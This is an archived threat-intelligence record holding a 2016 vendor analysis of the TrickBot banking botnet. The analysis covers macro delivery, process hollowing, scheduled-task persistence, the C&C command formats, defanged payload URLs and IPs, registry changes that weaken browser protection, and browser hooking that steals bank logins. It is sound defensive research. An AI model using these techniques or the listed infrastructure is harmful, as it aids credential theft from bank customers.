{
	"id": "a502c545-2408-44c7-b139-a4d1bc045f44",
	"created_at": "2026-04-06T00:20:05.193698Z",
	"updated_at": "2026-04-10T03:20:33.574866Z",
	"deleted_at": null,
	"sha1_hash": "2ab87828d49e26fcea473a49b8491de7e39e4024",
	"title": "Deep Analysis of the Online Banking Botnet TrickBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1895957,
	"plain_text": "Deep Analysis of the Online Banking Botnet TrickBot\r\nBy Xiaopeng Zhang\r\nPublished: 2016-12-06 · Archived: 2026-04-02 10:39:31 UTC\r\nOne month ago we captured a Word document infected with malicious VBA code, which was detected as\r\nWM/Agent!tr by the Fortinet AntiVirus service. Its file name is InternalFax.doc, and its MD5 is\r\n4F2139E3961202B1DFEAE288AED5CB8F. By our analysis, the Word document was used to download and spread the\r\nbotnet TrickBot. TrickBot aims at stealing online banking information from browsers when victims are visiting\r\nonline banks. The targeted banks are from Australia, New Zealand, Germany, United Kingdom, Canada, United\r\nStates, Israel, and Ireland, to name a few.\r\nHow TrickBot is downloaded to the victim’s system\r\nFigure 1 shows what the malicious Word document looks like when a victim opens it:\r\nFigure 1. The Word document is opened\r\nhttp://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot\r\nPage 1 of 20\r\nAs you can see, a warning message is shown in the foreground. However, in the background, its VBA code is\r\ndownloading the TrickBot sample from hxxp://fax-download.com/lindoc1.exe or\r\nhxxp://futuras.com/dodocdoddus.exe. Figure 2, below, shows the downloaded TrickBot sample. Its MD5 is\r\nD58CD6A8D6632EDCB6D9354FB094D395, and it is detected as W32/Generik.LWVNLMZ!tr by the Fortinet AntiVirus\r\nservice.\r\nFigure 2. The downloaded TrickBot sample\r\nTrickBot is installed on the victim’s system\r\nThe original TrickBot is a program developed with Visual Basic 6.0. To increase the difficulty of debugging and\r\nanalyzing it, the malware developer used a large number of self-defense techniques, including code self-modification, dynamic code extraction, and code/data encryption. Let’s go ahead and see how it works.\r\nWhen TrickBot is launched, it dynamically extracts code from itself, puts it into heap space, and then calls its entry\r\npoint. 
The main purpose is to call the Windows API CreateProcessW to run itself as a child process with the creation\r\nflag “CREATE_SUSPENDED.” This means that when the new process is created successfully, it is in a suspended\r\nstate, so the malware gets a chance to modify the child process’ code before sending the child\r\nprocess a signal (by calling an API) to resume and run the modified code. This is a common technique malware\r\nuses to protect its code. Figure 3 shows the call to the API CreateProcessW.\r\nFigure 3. Call CreateProcessW with CREATE_SUSPENDED flag\r\nAs mentioned above, it calls the ZwUnmapViewOfSection, ZwAllocateVirtualMemory, ZwWriteVirtualMemory,\r\nZwGetContextThread, ZwSetContextThread and ZwResumeThread APIs to modify the child process’ code. It then\r\nmodifies the thread context and finally resumes its execution. After that, the parent process finishes its job and\r\nexits soon afterwards. From now on, the code in the child process takes over and continues TrickBot’s job.\r\nLet’s move on and see how the child process works.\r\nActually, the child process is a loader, which loads a named resource from itself into heap space. Of course, the\r\ncontent of the resource is encrypted, but after decryption it appears as an executable code block. Soon the child\r\nprocess calls the executable’s entry point. The named resource is “IDR_X86BOT” or “IDR_X64BOT,” depending\r\non whether the victim’s system is 32-bit or 64-bit. In our analysis, according to the system type, the\r\nnamed resource is “IDR_X86BOT”. This also affects which executable files are downloaded from the C\u0026C server\r\nlater.\r\nThe code in the heap contains the main job of the child process. At first it creates a named mutex object by calling the\r\nfunction CreateMutex. This is used to check if another lindoc1.exe is running. 
If so, it stops doing anything else\r\nand exits the process. In this way, it ensures that only one lindoc1.exe runs at a time. The following\r\nASM code snippet shows how the named mutex object is created.\r\nNext, TrickBot tries to add itself as a task named “Bot” to the Task Scheduler, so that TrickBot can be\r\nexecuted in a timely manner. Figures 4 and 5 show screenshots of TrickBot’s task in Task Scheduler.\r\nFigure 4. New Task “Bot” in Task Scheduler\r\nFigure 5. The action of the TrickBot task\r\nThe task named “Bot” starts “lindoc1.exe” with “SYSTEM” account permission. As you might notice,\r\nthe original “lindoc1.exe” has been moved to\r\n“C:\\Windows\\system32\\config\\systmprofile\\AppData\\Roaming\\lindoc1.exe” because this folder is the equivalent of\r\n“%AppData%” for the local “SYSTEM” account.\r\nTrickBot creates a security identifier (SID) to check if the user running this process is “SYSTEM”. If not, it\r\nexits the process. See the following code snippet for details on how it checks the account.\r\nOf course, the current account is owned by the user who signed into Windows, and not “SYSTEM.” As you may\r\nrecall, only when TrickBot is executed by the Task Scheduler is the account “SYSTEM” (see Figure 4). So the\r\nchild process exits without doing anything further.\r\nTrickBot is executed by Task Scheduler\r\nWhen TrickBot is executed by the Task Scheduler with “SYSTEM” account permission, it passes the SID\r\ncheck. 
It then tries to get the victim’s public IP address by sending the following HTTP requests.\r\nThe public IP address will be used for communication with the C\u0026C server later.\r\nIt should be noted that most of the data, meaning files generated by TrickBot, are encrypted. TrickBot continually\r\nloads encrypted resource data with the name “CONFIG.” After decryption, it contains some information about\r\nTrickBot, including its version, group tag, and the IP addresses of its C\u0026C servers. All this information is used to\r\ncommunicate with its C\u0026C servers. If there is already a “config.conf” file, it reads the file and decrypts it to get\r\nthe “CONFIG” data instead. The content looks like this:\r\nAfter the IP addresses of the C\u0026C servers are received, TrickBot connects to them. I’m going to take one request as\r\nan example to show you what the command looks like:\r\nGET /lindoc1/AAA-PC_W617600.CA836C89ADF141D19A16BFA7397AD021/5/spk/\r\n“lindoc1” is the group tag.\r\n“AAA-PC_W617600.CA836C89ADF141D19A16BFA7397AD021” is the client ID, which is generated from the\r\ncurrent user name, Windows version and 32 random hexadecimal digits.\r\n“5” is the command ID. According to my analysis, command 5 is used to request downloading something\r\nfrom the C\u0026C server, so the server replies to this command with data.\r\n“spk” is additional information for command 5.\r\nNext, I’m going to show the requests and responses of some main commands in chronological order. In the\r\nrequests I use “Client_ID” to replace the real long client ID in order to reduce the request length. 
Note that the\r\nresponse data are all encrypted, so I decrypted them here for readability.\r\n[Command 0 request]:\r\nGET /lindoc1/Client_ID/0/Windows7x86/1012/PUBLIC IP/BC1A53480DD53727D4E197BC8DF20B0E8D113AA14C\r\nThis provides the C\u0026C server with the Windows version and the public IP address of the victim’s machine. The\r\nserver then replies with an expiration time and a new IP address, which are used to download DLLs later.\r\n[Response]:\r\n“1480550400” is a date/time value. After conversion it is “16:00 11/30 2016.” It tells us the C\u0026C server’s\r\nexpiration date and time. The IP address and port “37.1.213.189:447” point to a specific C\u0026C server that holds\r\nthe DLL files.\r\n[Command 23 request]:\r\nGET /lindoc1/Client_ID/23/1000004/\r\nThis sends the TrickBot version to the C\u0026C server to fetch the latest “CONFIG” from the C\u0026C server. When\r\nTrickBot runs into any errors in connecting to the C\u0026C server, it sends such a request. As you can see, the latest\r\nversion for now is 1000008. It is going to replace the previous “CONFIG” data as well. Also, the original response\r\ndata is saved in “config.conf” (replacing it if it already existed), which is checked first the next time TrickBot is executed.\r\n[Response]:\r\n[Command 5/systeminfo]:\r\nGET /lindoc1/Client_ID/5/systeminfo32/\r\nWhen the victim’s system type is 32-bit, it sends command 5 to download “systeminfo32,” a 32-bit DLL that is\r\nused to steal the victim’s system information. “systeminfo64” is for 64-bit systems. The request is sent to a C\u0026C\r\nserver whose IP address and port are obtained from Command 0’s response. 
In my analysis, it is\r\n“37.1.213.189:447.” The encrypted systeminfo32 is saved as “.\\Modules\\systeminfo32.”\r\nLater, it is executed in a newly-created process, “svchost.exe,” which focuses on collecting the victim’s system\r\ninformation, including its Windows version, CPU type, RAM capacity, user accounts, installed software, and\r\nservices. Here is the system information collected from my testing system.\r\nLater, the data is sent to a C\u0026C server as the body of a command 63 POST request, like this:\r\nPOST lindoc1/CLIENT_ID/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo\r\n[Command 5/injectDll]:\r\nGET /lindoc1/Client_ID/5/injectDll32/\r\nThis is a command 5 “GET” request to download the injectDll32 file from the C\u0026C server whose IP address comes\r\nfrom Command 0’s response, i.e. “37.1.213.189:447.” The encrypted injectDll32 is saved as\r\n“.\\Modules\\injectDll32.” In my analysis, this is a very important DLL, which is finally able to inject malicious\r\ncode into web browsers (IE, Chrome and Firefox) to monitor the victim’s online banking. I will explain how it\r\nworks in a later section.\r\n[Command 5/sinj]:\r\nGET /lindoc1/Client_ID/5/sinj/\r\nThis is a kind of configuration file for “injectDll”. It lists many online banks. The encrypted response data is\r\nsaved in “.\\Modules\\injectDll32_configs\\sinj”.\r\n[Command 5/dinj]:\r\nGET /lindoc1/Client_ID/5/dinj/\r\nThis command downloads the “dinj” file. It is another configuration file for “injectDll” that also contains\r\nonline bank information. 
It is saved in “.\\Modules\\injectDll32_configs\\dinj.”\r\nBelow is an example.\r\n[Command 5/dpost]:\r\nGET /lindoc1/Client_ID/5/dpost/\r\nThis command downloads a dpost file from the C\u0026C server, which contains another IP address and port that\r\nworks together with dinj. When the banks in the dinj file are matched, the stolen bank information is sent to\r\nthis IP address. It is also saved as “.\\Modules\\injectDll32_configs\\dpost.” The content of this file looks like this:\r\nhxxp://188.138.1.53:8082\r\n[Command 25]:\r\nGET /lindoc1/Client_ID/25/zm9ew0pP4BD8HxR5zzem/\r\nCommand 25 is used to get a new link to a bin file. The bin file is the new version of TrickBot. Before\r\nthis child process exits, the downloaded bin file replaces the old TrickBot and gets executed by calling the\r\nCreateProcessW function. In this way it updates itself automatically. During my analysis I could see that the\r\ndownloaded bin changed many times. The links include:\r\nhxxp://substan.merahost.ru/fog.bin\r\nhxxp://susan.merahost.ru/sonya.bin\r\nhxxp://susan.merahost.ru/shevchenko.bin\r\nhxxp://susan.merahost.ru/kabzon.bin\r\nhxxp://susanlaneg.temp.swtest.ru/kabzon2.bin\r\nhxxp://susanlaneg.temp.swtest.ru/peter.bin\r\nhxxp://susanlanegh.shn-host.ru/roma.bin\r\nHow injectDll steals online banking information\r\nTrickBot keeps updating its config files from time to time. In the latest version of the sinj and dinj files, it tries to steal\r\nonline banking information from dozens of banks.\r\nWhen injectDll32 is executed by svchost.exe, it enumerates all running processes to check whether each is a browser by\r\ncomparing process names. 
See the following code snippet for the details.\r\nFrom the above code, we know it only focuses on the “Chrome”, “IE” and “Firefox” browsers. After it picks one\r\nprocess, it combines the process ID with a constant string to form the name of a pipe. This named pipe\r\nis then used for communication between svchost.exe and the browser to transfer the content of sinj, dinj and dpost.\r\nThen injectDll prepares the code that will be injected into the browser, and calls CreateRemoteThread to execute the\r\ninjected code. This can be seen in the following code snippet.\r\nOn the browser side, it creates several thread functions. One is to communicate with injectDll32 over the named pipe,\r\nand the others set hook functions on some HTTP-related API functions and on the keyboard.\r\nIt also creates the following registry entries, so that IE can be hooked and monitored more easily:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\2500 = DWORD:3\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\TabProcGrowth = DWORD:0\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\NoProtectedModeBanner = DWORD:1\r\nIn thread function 1, it sends commands to svchost.exe over the named pipe to transfer the bank information (i.e.\r\nthe content of sinj, dinj and dpost) to the browser. Later, in thread function 2, it sets some hooks on WinINet\r\nand Nss3 APIs. In this way, the injected code can capture all HTTP requests from the browsers. 
Then the local\r\nhook functions can do further filtering of the HTTP requests against the bank information. If an HTTP\r\nrequest matches one of the listed banks, the request is copied and sent to the C\u0026C server. Let’s see which\r\nfunctions are hooked.\r\nFor WinINet:\r\nFor Nss3:\r\nThe following 2 screenshots show the original entry code and the hooked entry code of HttpSendRequestA.\r\nFigure 6. Original entry code of HttpSendRequestA\r\nFigure 7. Hooked entry code of HttpSendRequestA\r\nIt also sets a global keyboard hook so that it can monitor and collect the victim’s keyboard input. In this hook\r\nfunction it checks whether the keyboard input comes from the browser’s controls. Figure 8 shows how the global\r\nkeyboard hook is set.\r\nFigure 8. Set global keyboard hook\r\nI’m now going to provide a real example to explain how online banking login information is stolen, modified,\r\nand sent to the C\u0026C server. The example I’ll use is an online bank that is listed in sinj. As I understand it, “sinj” means\r\nstatic injection and “dinj” means dynamic injection.\r\nHere we go. First, we open IE and go to the login page. Enter the testing Customer ID “0903670001” and User ID\r\n“1234567890,” as shown in Figure 9.\r\nFigure 9. Online bank’s login page\r\nWhen we click the “Continue” button, it sends the following POST request:\r\nThe data is captured by the local hook function of HttpSendRequestW and later modified to this:\r\nAs you may have noticed, the strings in green are modified or newly added. The string in yellow is the data that I\r\nentered on the bank’s login page. 
It is sent to the C\u0026C server, whose IP address and port are from command\r\n23’s response.\r\nTrickBot flow charts\r\nHere are the flow charts that show how TrickBot is executed on the victim’s machine.\r\nFigure 10. TrickBot is first executed\r\nFigure 11. TrickBot is executed by Task Scheduler\r\nConclusion\r\nThrough this analysis, we know how TrickBot installs itself on the victim’s machine, how it communicates with\r\nthe C\u0026C server, what online banking information it steals from the victim’s browser and how, and\r\nfinally how it upgrades itself from time to time.\r\nFortinet has published an IPS signature, “Trick.Botnet”, to detect the communication between TrickBot and its\r\nC\u0026C servers.\r\nSource: http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot"
	],
	"report_names": [
		"deep-analysis-of-the-online-banking-botnet-trickbot"
	],
	"threat_actors": [],
	"ts_created_at": 1775434805,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.pdf",
		"text": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.txt",
		"img": "https://archive.orkl.eu/2ab87828d49e26fcea473a49b8491de7e39e4024.jpg"
	}
}